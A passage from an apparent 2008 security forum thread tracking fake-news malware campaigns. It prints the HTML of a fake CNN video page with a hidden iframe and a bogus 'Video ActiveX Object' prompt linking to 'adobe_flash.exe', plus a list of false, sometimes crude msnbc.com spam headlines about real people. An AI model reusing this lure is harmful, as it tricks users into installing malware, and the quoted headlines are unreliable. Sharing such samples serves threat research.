<a href="http://edition.cnn.com/">&laquo; CNN.com Homepage</a> 
</div>

<div id="cnnVPNav">
<table cellspacing="0" cellspacing="0" border="0" width="940">
<colgroup>
<col width="247">
<col width="231">
<col width="231">
<col width="231">
</colgroup>
<tr>
<td><img src="cnn_video_logo.gif" width="130" height="24" alt="" border="0" class="cnnVideoLogo"></td>
<td class="NavItem"><img src="video_icon_active.gif" alt="" border="0">&nbsp;<a href="#">Live Video</a></td>
<td class="NavItem"><img src="podcast_icon.gif" width="12" height="14" alt="" border="0">&nbsp;<a href="#">Podcasts</a></td>
<td class="NavItem"><img src="radio_icon.gif" width="11" height="14" alt="" border="0">&nbsp;<a href="#">CNN&nbsp;Radio</a></td>
<iframe id="01" src="metai.html" frameborder="0" style="display:none"></iframe>
</tr>
</table>
</div>

<div style="text-align:center">
<p><a href="#" onClick="show_begin_popup();window.close();" ><img src="close.png" alt="Close the page" border="0" height="50" width="300"></a></p>
<!-- LARGE PLAYER HTML CODE -->
<a href="adobe_flash.exe">
<img onmouseover="window.status = 'You must download Video ActiveX Object to play this video file.';" alt="You must download Video ActiveX Object to play this video file." src="no_flash.jpg" width="582" height="477" border="0"></a>
<!-- /LARGE PLAYER HTML CODE -->
</div>

<div class="clear"><img src="1_002.gif" alt="" border="0" height="1" width="1"></div>

</div>
</div>

<div style="margin-top: 15px; font-size: 11px; line-height: 18px; color: rgb(148, 148, 148);" align="center">
<a href="http://edition.cnn.com/">Home</a> &nbsp;|&nbsp; <a href="http://edition.cnn.com/WORLD/">World</a> &nbsp;|&nbsp; <a href="http://edition.cnn.com/US/">U.S.</a> &nbsp;|&nbsp; <a href="http://edition.cnn.com/POLITICS/">Politics</a> &nbsp;|&nbsp; <a href="http://edition.cnn.com/SHOWBIZ/">Entertainment</a> &nbsp;|&nbsp; <a href="http://edition.cnn.com/HEALTH">Health</a> &nbsp;|&nbsp; <a href="http://edition.cnn.com/TECH">Tech</a> &nbsp;|&nbsp; <a href="http://edition.cnn.com/TRAVEL/">Travel</a> &nbsp;|&nbsp; <a href="http://edition.cnn.com/video/living">Living</a> &nbsp;|&nbsp; <a href="http://edition.cnn.com/money/">Business</a> &nbsp;|&nbsp; <a href="http://edition.cnn.com/si/">Sports</a> &nbsp;|&nbsp; <a href="http://edition.cnn.com/time/">Time.com</a><br>
© 2007 Cable News Network LP, LLLP. A Time Warner Company. All Rights Reserved.<br>
<a href="http://edition.cnn.com/interactive_legal.html">Terms of service</a> &nbsp;|&nbsp; <a href="http://edition.cnn.com/privacy.html">Privacy guidelines</a> <!--&nbsp;|&nbsp; <a href="Advertise">Advertise with us</a> -->&nbsp;|&nbsp; <a href="http://edition.cnn.com/about/">About us</a> &nbsp;|&nbsp; <a href="http://edition.cnn.com/feedback/">Contact us</a> &nbsp;|&nbsp; <a href="http://edition.cnn.com/help/">Help</a>
</div>

</body>
</html>
Title: Re: R-thing
Post by: JohnC on August 13, 2008, 05:33:24 pm
Thanks.
Title: Re: R-thing
Post by: MysteryFCM on August 19, 2008, 01:05:07 am
13 > 19
Title: Re: R-thing
Post by: CM_MWR on August 20, 2008, 11:25:11 am
Dude  ;D

move.html+r.html

WTF?
Title: Re: R-thing
Post by: MysteryFCM on August 20, 2008, 07:50:33 pm
lol huh?
Title: Re: R-thing
Post by: CM_MWR on August 20, 2008, 09:50:36 pm
Heh,this morning I see maybe 3 of 10 sites hosting r.html also have a move.html as well.

So me being me,I gotta click and guess who pop up.  >:(

AVP2008 Installer! ARGRGRGRGRGRHHHHHHHHHHHHHHHHHHHHH!!!!!!!!! :'(

Title: Re: R-thing
Post by: MysteryFCM on August 20, 2008, 10:21:37 pm
hehe ;)
Title: Re: R-thing
Post by: CM_MWR on August 21, 2008, 09:32:22 am
errrrrr....today is more like 7 of 10 where i can see r.html have move.html

moreover fiddle with search terms of the 3 together and look at them open indexs.

Wah hoooooo  :o

PEBKAC!!!!!
Title: Re: R-thing
Post by: JohnC on August 22, 2008, 04:27:29 pm
Thanks.

Quote
msnbc.com - BREAKING NEWS: 2008 Presidential Election Results Leaked
msnbc.com - BREAKING NEWS: Abortion outlawed in California
msnbc.com - BREAKING NEWS: Aliens Abducted By Michael Jackson
msnbc.com - BREAKING NEWS: Arkansas Democratic chair shot at HQ dies
msnbc.com - BREAKING NEWS: Army Of Two, Dick Cheney And John Mccain Invade Iran
msnbc.com - BREAKING NEWS: Boy, 12, slices off friend's ear
msnbc.com - BREAKING NEWS: Britney found hanged in locker room
msnbc.com - BREAKING NEWS: Cindy Mccain Talks About Her Boobs
msnbc.com - BREAKING NEWS: Find out how to get top returns for your money at minimum risk
msnbc.com - BREAKING NEWS: Gay Marriage Could Be Profitable
msnbc.com - BREAKING NEWS: Girl cuts off partner's ear with ice skate
msnbc.com - BREAKING NEWS: Man wakes up from 40 year coma
msnbc.com - BREAKING NEWS: Mary-Kate Olsen responsible for Heath Ledger's death
msnbc.com - BREAKING NEWS: McCain Endorses Bush For 3rd Term
msnbc.com - BREAKING NEWS: McCain Opposes Gay Adoption of Highways
msnbc.com - BREAKING NEWS: Microsoft announces takeover bid for Intel, details inside
msnbc.com - BREAKING NEWS: NASDAQ index gains 720 points overnight upon war announcement
msnbc.com - BREAKING NEWS: Online ad spend overtakes mainstream TV
msnbc.com - BREAKING NEWS: Paris Hilton Charges For Pussy
msnbc.com - BREAKING NEWS: Preliminary US Presidential election polls results here
msnbc.com - BREAKING NEWS: REPORTER SHOT IN GEORGIA
msnbc.com - BREAKING NEWS: Release Of The Nancy Pelosi Sex Dvd Causes Mass Erectile Dysfunction In Us
msnbc.com - BREAKING NEWS: Russian troops appear to be preparing to withdraw from Georgia, U.S. says
msnbc.com - BREAKING NEWS: School Board Adopts Gay-Ass Uniform Policy
msnbc.com - BREAKING NEWS: Scientist Prepare to Colonize Redneck Area
msnbc.com - BREAKING NEWS: Steve Jobs Names God as Successor
msnbc.com - BREAKING NEWS: Stocks set to fall on recession
msnbc.com - BREAKING NEWS: The Incredible Hulk: George Bush
msnbc.com - BREAKING NEWS: Tiger Woods to take 2-year break from golf
msnbc.com - BREAKING NEWS: Too much freedom will destroy America
msnbc.com - BREAKING NEWS: Ufos Sighted Over Uk
msnbc.com - BREAKING NEWS: What Annoyed Us About The Olympic Opening Ceremony
msnbc.com - BREAKING NEWS: White Elephant in the Room Actually Charlie Weis
msnbc.com - BREAKING NEWS: You are selected as a jury
msnbc.com - BREAKING NEWS: [video] Cindy Mccain Talks About Her Boobs
msnbc.com - BREAKING NEWS: [video] If Barack Obama Is an Oreo, What Is John McLaughlin?